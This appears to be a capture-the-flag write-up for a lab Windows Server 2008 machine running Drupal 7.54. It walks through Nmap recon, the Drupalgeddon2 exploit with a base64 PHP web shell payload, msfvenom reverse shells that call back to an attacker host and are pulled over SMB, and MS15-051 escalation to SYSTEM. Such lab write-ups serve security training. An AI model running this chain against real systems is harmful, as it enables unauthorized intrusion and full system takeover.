My first step was to perform an Nmap scan against the machine:
# Nmap 7.91 scan initiated Fri Dec 18 14:03:28 2020 as: nmap -sV -sC -p- -oN scan -O 10.10.10.9 Nmap scan report for 10.10.10.9 Host is up (0.029s latency). Not shown: 65532 filtered ports PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 7.5 |_http-generator: Drupal 7 (http://drupal.org) | http-methods: |_ Potentially risky methods: TRACE | http-robots.txt: 36 disallowed entries (15 shown) | /includes/ /misc/ /modules/ /profiles/ /scripts/ | /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt | /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt |_/LICENSE.txt /MAINTAINERS.txt |_http-server-header: Microsoft-IIS/7.5 |_http-title: Welcome to 10.10.10.9 | 10.10.10.9 135/tcp open msrpc Microsoft Windows RPC 49154/tcp open msrpc Microsoft Windows RPC Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose|phone|specialized Running (JUST GUESSING): Microsoft Windows 8|Phone|2008|7|8.1|Vista|2012 (92%) OS CPE: cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows_server_2012 Aggressive OS guesses: Microsoft Windows 8.1 Update 1 (92%), Microsoft Windows Phone 7.5 or 8.0 (92%), Microsoft Windows 7 or Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 or Windows 8.1 (91%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (91%), Microsoft Windows 7 (91%), Microsoft Windows 7 Professional or Windows 8 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 R2 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 SP2 or 2008 R2 SP1 (91%) No exact OS matches for host (test conditions non-ideal). Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Fri Dec 18 14:08:24 2020 -- 1 IP address (1 host up) scanned in 296.09 seconds
We can see from the output that there are a number of ports open. HTTP on port 80 running Drupal, Also 135 and 49154 running MSRPC. I decided to start with port 80 as this is the one I’m most familiar with.
By browsing to http://10.10.10.9/CHANGELOG.txt you can see that it is running drupal version 7.54. I used searchsploit to identify vulnerabilities in this version of Drupal.
┌──(root💀kali)-[/home/kali/Downloads/ms15-051/MS15-051-KB3045171] └─# searchsploit drupal 7 --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------- Exploit Title | Path --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------- Drupal 4.1/4.2 - Cross-Site Scripting | php/webapps/22940.txt Drupal 4.5.3 < 4.6.1 - Comments PHP Injection | php/webapps/1088.pl Drupal 4.7 - 'Attachment mod_mime' Remote Command Execution | php/webapps/1821.php Drupal 4.x - URL-Encoded Input HTML Injection | php/webapps/27020.txt Drupal 5.2 - PHP Zend Hash ation Vector | php/webapps/4510.txt Drupal 6.15 - Multiple Persistent Cross-Site Scripting Vulnerabilities | php/webapps/11060.txt Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Add Admin User) | php/webapps/34992.py Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Admin Session) | php/webapps/44355.php Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (PoC) (Reset Password) (1) | php/webapps/34984.py Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (PoC) (Reset Password) (2) | php/webapps/34993.php Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Remote Code Execution) | php/webapps/35150.php Drupal 7.12 - Multiple Vulnerabilities | php/webapps/18564.txt Drupal 7.x Module Services - Remote Code Execution | php/webapps/41564.php Drupal < 4.7.6 - Post Comments Remote Command Execution | php/webapps/3313.pl Drupal < 5.1 - Post Comments Remote Command Execution | php/webapps/3312.pl Drupal < 5.22/6.16 - Multiple Vulnerabilities | php/webapps/33706.txt Drupal < 7.34 - Denial of Service | php/dos/35415.txt Drupal < 7.34 - Denial of Service | php/dos/35415.txt Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code (Metasploit) | php/webapps/44557.rb Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code Execution (PoC) | php/webapps/44542.txt Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution | php/webapps/44449.rb Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution | php/webapps/44449.rb Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (Metasploit) | php/remote/44482.rb Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (Metasploit) | php/remote/44482.rb Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (PoC) | php/webapps/44448.py Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) | php/remote/46510.rb Drupal < 8.6.10 / < 8.5.11 - REST Module Remote Code Execution | php/webapps/46452.txt Drupal < 8.6.9 - REST Module Remote Code Execution | php/webapps/46459.py Drupal avatar_uploader v7.x-1.0-beta8 - Arbitrary File Disclosure | php/webapps/44501.txt Drupal Module CKEditor < 4.1WYSIWYG (Drupal 6.x/7.x) - Persistent Cross-Site Scripting | php/webapps/25493.txt Drupal Module CODER 2.5 - Remote Command Execution (Metasploit) | php/webapps/40149.rb Drupal Module Coder < 7.x-1.3/7.x-2.6 - Remote Code Execution | php/remote/40144.php Drupal Module Cumulus 5.x-1.1/6.x-1.4 - 'tagcloud' Cross-Site Scripting | php/webapps/35397.txt Drupal Module Drag & Drop Gallery 6.x-1.5 - 'upload.php' Arbitrary File Upload | php/webapps/37453.php Drupal Module Embedded Media Field/Media 6.x : Video Flotsam/Media: Audio Flotsam - Multiple Vulnerabilities | php/webapps/35072.txt Drupal Module RESTWS 7.x - PHP Remote Code Execution (Metasploit) | php/remote/40130.rb --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------- Shellcodes: No Results
After some trial and error I discovered that the “Drupalgeddon2” exploit 44449.rb was successfull.
┌──(root💀kali)-[/home/kali/Documents/bastard] └─# ruby 44449 http://10.10.10.9 2 ⚙ ruby: warning: shebang line ending with \r may cause problems [*] --==[::#Drupalggedon2::]==-- -------------------------------------------------------------------------------- [i] Target : http://10.10.10.9/ -------------------------------------------------------------------------------- [+] Found : http://10.10.10.9/CHANGELOG.txt (HTTP Response: 200) [+] Drupal!: v7.54 -------------------------------------------------------------------------------- [*] Testing: Form (user/password) [+] Result : Form valid - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - [*] Testing: Clean URLs [+] Result : Clean URLs enabled -------------------------------------------------------------------------------- [*] Testing: Code Execution (Method: name) [i] Payload: echo YVSJVABF [+] Result : YVSJVABF [+] Good News Everyone! Target seems to be exploitable (Code execution)! w00hooOO! -------------------------------------------------------------------------------- [*] Testing: Existing file (http://10.10.10.9/shell.php) [i] Response: HTTP 404 // Size: 12 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - [*] Testing: Writing To Web Root (./) [i] Payload: echo PD9waHAgaWYoIGlzc2V0KCAkX1JFUVVFU1RbJ2MnXSApICkgeyBzeXN0ZW0oICRfUkVRVUVTVFsnYyddIC4gJyAyPiYxJyApOyB9 | base64 -d | tee shell.php [!] Target is NOT exploitable [2-4] (HTTP Response: 404)... Might not have write access? - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - [*] Testing: Existing file (http://10.10.10.9/sites/default/shell.php) [i] Response: HTTP 404 // Size: 12 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - [*] Testing: Writing To Web Root (sites/default/) [i] Payload: echo PD9waHAgaWYoIGlzc2V0KCAkX1JFUVVFU1RbJ2MnXSApICkgeyBzeXN0ZW0oICRfUkVRVUVTVFsnYyddIC4gJyAyPiYxJyApOyB9 | base64 -d | tee sites/default/shell.php [!] Target is NOT exploitable [2-4] (HTTP Response: 404)... Might not have write access? - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - [*] Testing: Existing file (http://10.10.10.9/sites/default/files/shell.php) [i] Response: HTTP 404 // Size: 12 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - [*] Testing: Writing To Web Root (sites/default/files/) [*] Moving : ./sites/default/files/.htaccess [i] Payload: mv -f sites/default/files/.htaccess sites/default/files/.htaccess-bak; echo PD9waHAgaWYoIGlzc2V0KCAkX1JFUVVFU1RbJ2MnXSApICkgeyBzeXN0ZW0oICRfUkVRVUVTVFsnYyddIC4gJyAyPiYxJyApOyB9 | base64 -d | tee sites/default/files/shell.php [!] Target is NOT exploitable [2-4] (HTTP Response: 404)... Might not have write access? [!] FAILED : Couldn't find a writeable web path -------------------------------------------------------------------------------- [*] Dropping back to direct OS commands drupalgeddon2>> whoami nt authority\iusr drupalgeddon2>>
You can see from the output that a shell was spawned and I was logged in as the user isur. This shell however wasnt persistent. So I generated a reverse shell in msfvenom:
┌──(root💀kali)-[/var/www] └─# msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.19 LPORT=2600 -f exe > reverse.exe 1 ⚙ [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch selected, selecting arch: x86 from the payload No encoder specified, outputting raw payload Payload size: 324 bytes Final size of exe file: 73802 bytes
I then started an SMB server on the kali machine to host the reverse.exe reverse shell I just created:
──(root💀kali)-[/var/www] └─# python3 smbserver.py testshare -smb2support /var/www/
I then started a netcat listener on the kali machine port port 2600 to capture the reverse shell.
┌──(root💀kali)-[/home/kali] └─# nc -nvlp 2600 1 ⨯ 1 ⚙ listening on [any] 2600 ...
The reverse shell was then downloaded to the Bastard machine using the drupalgeddon2 shell and executed.
drupalgeddon2>> copy \\10.10.14.19\testshare\reverse.exe 1 file(s) copied. drupalgeddon2>> reverse.exe
From the output below, you can see that the shell was successfully captured in netcat, and the user flag was captured.
┌──(root💀kali)-[/home/kali] └─# nc -nvlp 2600 1 ⨯ 1 ⚙ listening on [any] 2600 ... connect to [10.10.14.19] from (UNKNOWN) [10.10.10.9] 49739 Microsoft Windows [Version 6.1.7600] Copyright (c) 2009 Microsoft Corporation. All rights reserved. C:\inetpub\drupal-7.54>cd /users cd /users C:\Users>dir dir Volume in drive C has no label. Volume Serial Number is 605B-4AAA Directory of C:\Users 19/03/2017 07:35 �� <DIR> . 19/03/2017 07:35 �� <DIR> .. 19/03/2017 01:20 �� <DIR> Administrator 19/03/2017 01:54 �� <DIR> Classic .NET AppPool 19/03/2017 07:35 �� <DIR> dimitris 14/07/2009 06:57 �� <DIR> Public 0 File(s) 0 bytes 6 Dir(s) 30.807.498.752 bytes free C:\Users>cd dimitris cd dimitris C:\Users\dimitris>cd Desktop cd Desktop C:\Users\dimitris\Desktop>dir dir Volume in drive C has no label. Volume Serial Number is 605B-4AAA Directory of C:\Users\dimitris\Desktop 19/03/2017 08:04 �� <DIR> . 19/03/2017 08:04 �� <DIR> .. 19/03/2017 08:06 �� 32 user.txt 1 File(s) 32 bytes 2 Dir(s) 30.807.498.752 bytes free C:\Users\dimitris\Desktop>type user.txt type user.txt [REDACTED]
The next step was to esclate privilages. I ran systeminfo and discovered that it was an unpatched Server 2008 machine.
C:\Users\dimitris\Desktop>systeminfo systeminfo Host Name: BASTARD OS Name: Microsoft Windows Server 2008 R2 Datacenter OS Version: 6.1.7600 N/A Build 7600 OS Manufacturer: Microsoft Corporation OS Configuration: Standalone Server OS Build Type: Multiprocessor Free Registered Owner: Windows User Registered Organization: Product ID: 00496-001-0001283-84782 Original Install Date: 18/3/2017, 7:04:46 �� System Boot Time: 27/12/2020, 3:37:18 �� System Manufacturer: VMware, Inc. System Model: VMware Virtual Platform System Type: x64-based PC Processor(s): 2 Processor(s) Installed. [01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz [02]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018 Windows Directory: C:\Windows System Directory: C:\Windows\system32 Boot Device: \Device\HarddiskVolume1 System Locale: el;Greek Input Locale: en-us;English (United States) Time Zone: (UTC+02:00) Athens, Bucharest, Istanbul Total Physical Memory: 2.047 MB Available Physical Memory: 1.536 MB Virtual Memory: Max Size: 4.095 MB Virtual Memory: Available: 3.530 MB Virtual Memory: In Use: 565 MB Page File Location(s): C:\pagefile.sys Domain: HTB Logon Server: N/A Hotfix(s): N/A Network Card(s): 1 NIC(s) Installed. [01]: Intel(R) PRO/1000 MT Network Connection Connection Name: Local Area Connection DHCP Enabled: No IP address(es) [01]: 10.10.10.9
Because of this, there are multiple kernel exploits that should be successful in escalating privilages. I decided to try MS15-015 as I had had some luck with this exploit in the past. I downloaded the ZIP file from the github page, extracted the 64bit exe and copied it into /var/www so it can be transfered to the Bastard machine.
┌──(root💀kali)-[/home/kali/Downloads/ms15-051] └─# unzip MS15-051-KB3045171.zip Archive: MS15-051-KB3045171.zip creating: MS15-051-KB3045171/ inflating: MS15-051-KB3045171/ms15-051.exe inflating: MS15-051-KB3045171/ms15-051x64.exe creating: MS15-051-KB3045171/Source/ creating: MS15-051-KB3045171/Source/ms15-051/ inflating: MS15-051-KB3045171/Source/ms15-051/ms15-051.cpp inflating: MS15-051-KB3045171/Source/ms15-051/ms15-051.vcxproj inflating: MS15-051-KB3045171/Source/ms15-051/ms15-051.vcxproj.filters inflating: MS15-051-KB3045171/Source/ms15-051/ms15-051.vcxproj.user inflating: MS15-051-KB3045171/Source/ms15-051/ntdll.lib inflating: MS15-051-KB3045171/Source/ms15-051/ntdll64.lib inflating: MS15-051-KB3045171/Source/ms15-051/ReadMe.txt creating: MS15-051-KB3045171/Source/ms15-051/Win32/ inflating: MS15-051-KB3045171/Source/ms15-051/Win32/ms15-051.exe creating: MS15-051-KB3045171/Source/ms15-051/x64/ inflating: MS15-051-KB3045171/Source/ms15-051/x64/ms15-051x64.exe inflating: MS15-051-KB3045171/Source/ms15-051.sln inflating: MS15-051-KB3045171/Source/ms15-051.suo ┌──(root💀kali)-[/home/kali/Downloads/ms15-051] └─# ls MS15-051-KB3045171 MS15-051-KB3045171.zip ┌──(root💀kali)-[/home/kali/Downloads/ms15-051] └─# cd MS15-051-KB3045171 ┌──(root💀kali)-[/home/kali/Downloads/ms15-051/MS15-051-KB3045171] └─# ls ms15-051.exe ms15-051x64.exe Source ┌──(root💀kali)-[/home/kali/Downloads/ms15-051/MS15-051-KB3045171] └─# cp ms15-051x64.exe /var/www
When this exe is run, it takes the command you want to execute as the argument. So I decided to create another reverse shell going to port 2602 on the Kali machine. This is what I execute as the argument of the MS15-051 exploit. I essentially get a SYSTEM privilage reverse shell. I created the reverse shell:
┌──(root💀kali)-[/var/www] └─# msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.19 LPORT=2602 -f exe > reverse2602.exe 1 ⚙ [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch selected, selecting arch: x86 from the payload No encoder specified, outputting raw payload Payload size: 324 bytes Final size of exe file: 73802 bytes
Then on the Bastard machine copied both the reverse shell and the MS15-051 exploit to the machine.
C:\inetpub\drupal-7.54>copy \\10.10.14.19\testshare\ms15-051x64.exe copy \\10.10.14.19\testshare\ms15-051x64.exe 1 file(s) copied. C:\inetpub\drupal-7.54>copy \\10.10.14.19\testshare\reverse2602.exe copy \\10.10.14.19\testshare\reverse2602.exe 1 file(s) copied.
A new netcat listener was then started on the kali machine listening on port 2602 to capture the new reverse shell.
┌──(root💀kali)-[/var/www] └─# nc -nvlp 2602 listening on [any] 2602 ...
The exploit was then run:
C:\inetpub\drupal-7.54>ms15-051-x64.exe "reverse2602.exe" ms15-051-x64.exe "reverse2602.exe" 'ms15-051-x64.exe' is not recognized as an internal or external command, operable program or batch file. C:\inetpub\drupal-7.54>ms15-051x64.exe "reverse2602.exe" ms15-051x64.exe "reverse2602.exe" [#] ms15-051 fixed by zcgonvh [!] process with pid: 624 created. ==============================
You can see from the output berlow, the reverse system shell was successfully captured and was able to capture the root flag.
┌──(root💀kali)-[/var/www] └─# nc -nvlp 2602 listening on [any] 2602 ... connect to [10.10.14.19] from (UNKNOWN) [10.10.10.9] 49681 Microsoft Windows [Version 6.1.7600] Copyright (c) 2009 Microsoft Corporation. All rights reserved. C:\inetpub\drupal-7.54>whoami whoami nt authority\system C:\inetpub\drupal-7.54>cd / cd / C:\>cd Users cd Users C:\Users>dir dir Volume in drive C has no label. Volume Serial Number is 605B-4AAA Directory of C:\Users 19/03/2017 07:35 �� <DIR> . 19/03/2017 07:35 �� <DIR> .. 19/03/2017 01:20 �� <DIR> Administrator 19/03/2017 01:54 �� <DIR> Classic .NET AppPool 19/03/2017 07:35 �� <DIR> dimitris 14/07/2009 06:57 �� <DIR> Public 0 File(s) 0 bytes 6 Dir(s) 30.807.498.752 bytes free C:\Users>cd Administrator cd Administrator C:\Users\Administrator>dir dir Volume in drive C has no label. Volume Serial Number is 605B-4AAA Directory of C:\Users\Administrator 19/03/2017 01:20 �� <DIR> . 19/03/2017 01:20 �� <DIR> .. 19/03/2017 01:20 �� <DIR> Contacts 19/03/2017 07:33 �� <DIR> Desktop 19/03/2017 02:09 �� <DIR> Documents 19/03/2017 12:42 �� <DIR> Downloads 19/03/2017 01:20 �� <DIR> Favorites 19/03/2017 01:20 �� <DIR> Links 19/03/2017 01:20 �� <DIR> Music 19/03/2017 01:20 �� <DIR> Pictures 19/03/2017 01:20 �� <DIR> Saved Games 19/03/2017 01:20 �� <DIR> Searches 19/03/2017 01:20 �� <DIR> Videos 0 File(s) 0 bytes 13 Dir(s) 30.807.498.752 bytes free C:\Users\Administrator>cd Desktop cd Desktop C:\Users\Administrator\Desktop>dir dir Volume in drive C has no label. Volume Serial Number is 605B-4AAA Directory of C:\Users\Administrator\Desktop 19/03/2017 07:33 �� <DIR> . 19/03/2017 07:33 �� <DIR> .. 19/03/2017 07:34 �� 32 root.txt.txt 1 File(s) 32 bytes 2 Dir(s) 30.807.498.752 bytes free C:\Users\Administrator\Desktop>type root.txt.txt type root.txt.txt [REDACTED]